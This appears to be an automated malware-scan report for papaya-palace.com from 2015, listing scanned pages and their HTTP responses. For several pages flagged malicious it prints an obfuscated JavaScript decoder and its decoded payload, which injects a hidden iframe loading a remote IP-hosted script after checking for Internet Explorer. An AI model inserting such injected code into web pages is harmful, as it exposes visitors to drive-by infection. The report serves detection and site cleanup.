Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=papaya-palace.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.papaya-palace.com/ | 200 OK Content-Length: 95 Content-Type: text/html | clean |
http://www.papaya-palace.com/test404page.js | 404 Not Found Content-Length: 1640 Content-Type: text/html | clean |
http://www.papaya-palace.com/katbooks | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://www.papaya-palace.com/katbooks/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.papaya-palace.com/katbooks/ | 200 OK Content-Length: 14168 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/vmabout.html | 200 OK Content-Length: 3547 Content-Type: text/html | clean |
http://www.papaya-palace.com/katlog/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=UTF-8 X-Pingback: http://papaya-palace.com/katlog/xmlrpc.php X-Powered-By: PHP/5.2.11 | clean |
http://papaya-palace.com/katlog/ | 200 OK Content-Length: 28958 Content-Type: text/html | clean |
http://www.google.com/reader/ui/publisher-en.js | HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 16:21:17 GMT Age: 3382 Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 16:21:17 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.google.com/reader/about/ | 200 OK Content-Length: 3563 Content-Type: text/html | clean |
http://www.google.com//www.google.com/js/google.js/ | 404 Not Found Content-Length: 1453 Content-Type: text/html | clean |
http://www.google.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.google.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://www.google.com//www.google.com/js/maia.js/ | 404 Not Found Content-Length: 1451 Content-Type: text/html | clean |
http://www.google.com/reader/public/javascript-sub/user/10725955556447852308/label/blogroll?callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cb%3A%22true%22%7D)%3Bnew%20GRC | HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 17:17:40 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.papaya-palace.com/portal.html | 404 Not Found Content-Length: 1640 Content-Type: text/html | clean |
http://www.papaya-palace.com/katlog | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.papaya-palace.com/katbooks/archives/cat_general_fiction.html | 200 OK Content-Length: 11179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000492.html | 200 OK Content-Length: 11258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000491.html | 200 OK Content-Length: 18559 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports:
| ||
http://www.papaya-palace.com/katbooks/archives/000490.html | 200 OK Content-Length: 12044 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: papaya-palace.com
Result:
GET / HTTP/1.1
Host: papaya-palace.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: papaya-palace.com
Referer: http://www.google.com/search?q=papaya-palace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: papaya-palace.com
Referer: http://www.google.com/search?q=papaya-palace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.